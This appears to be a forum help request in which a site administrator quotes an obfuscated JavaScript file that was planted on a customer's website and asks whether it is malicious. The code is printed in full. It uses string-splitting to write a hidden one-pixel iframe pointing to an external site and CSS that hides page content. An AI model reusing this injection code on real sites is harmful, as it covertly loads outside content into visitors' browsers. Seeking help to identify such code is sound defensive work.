They are 100% certain that it was not put there by them. Here are t..."/>

Possible javascript hack?

A customer of mine found the following line of code in their index.html:

<script language=javascript src="/images/java.js"></script>

They are 100% certain that it was not put there by them.

Here are the contents of the java.js file:

url = "fotoprofit.com/photo_catalog/index.php";
qwe = ' di'+'spl'+'ay:n'+'one'+';}</s'+'ty'+'le>';
rty = '" FR'+'AMEB'+'ORD'+'ER="0" WIDTH=1 HEIGHT=1'+'0%></I'+'F'+'RA'+'ME>';
uio = '<s'+'tyl'+'e type="text/css">';
asd = '<IF'+'RA'+'ME SRC="';
fgh = ' .t'+'ex'+'t {vi'+'sib'+'ili'+'ty:h'+'idd'+'en;';
a = asd+url+rty;
b = uio+fgh+qwe;
document.write (a);
document.write (b);
self.focus();
setInterval("window.status='...'",7);

Does anyone have any idea what this code does? I'm not familiar with JavaScript, is it malicious in any way? Also, any ideas on how that file got put there in the first place? This is a cPanel box.

Any advice would be appreciated.

 

 

 

 

Top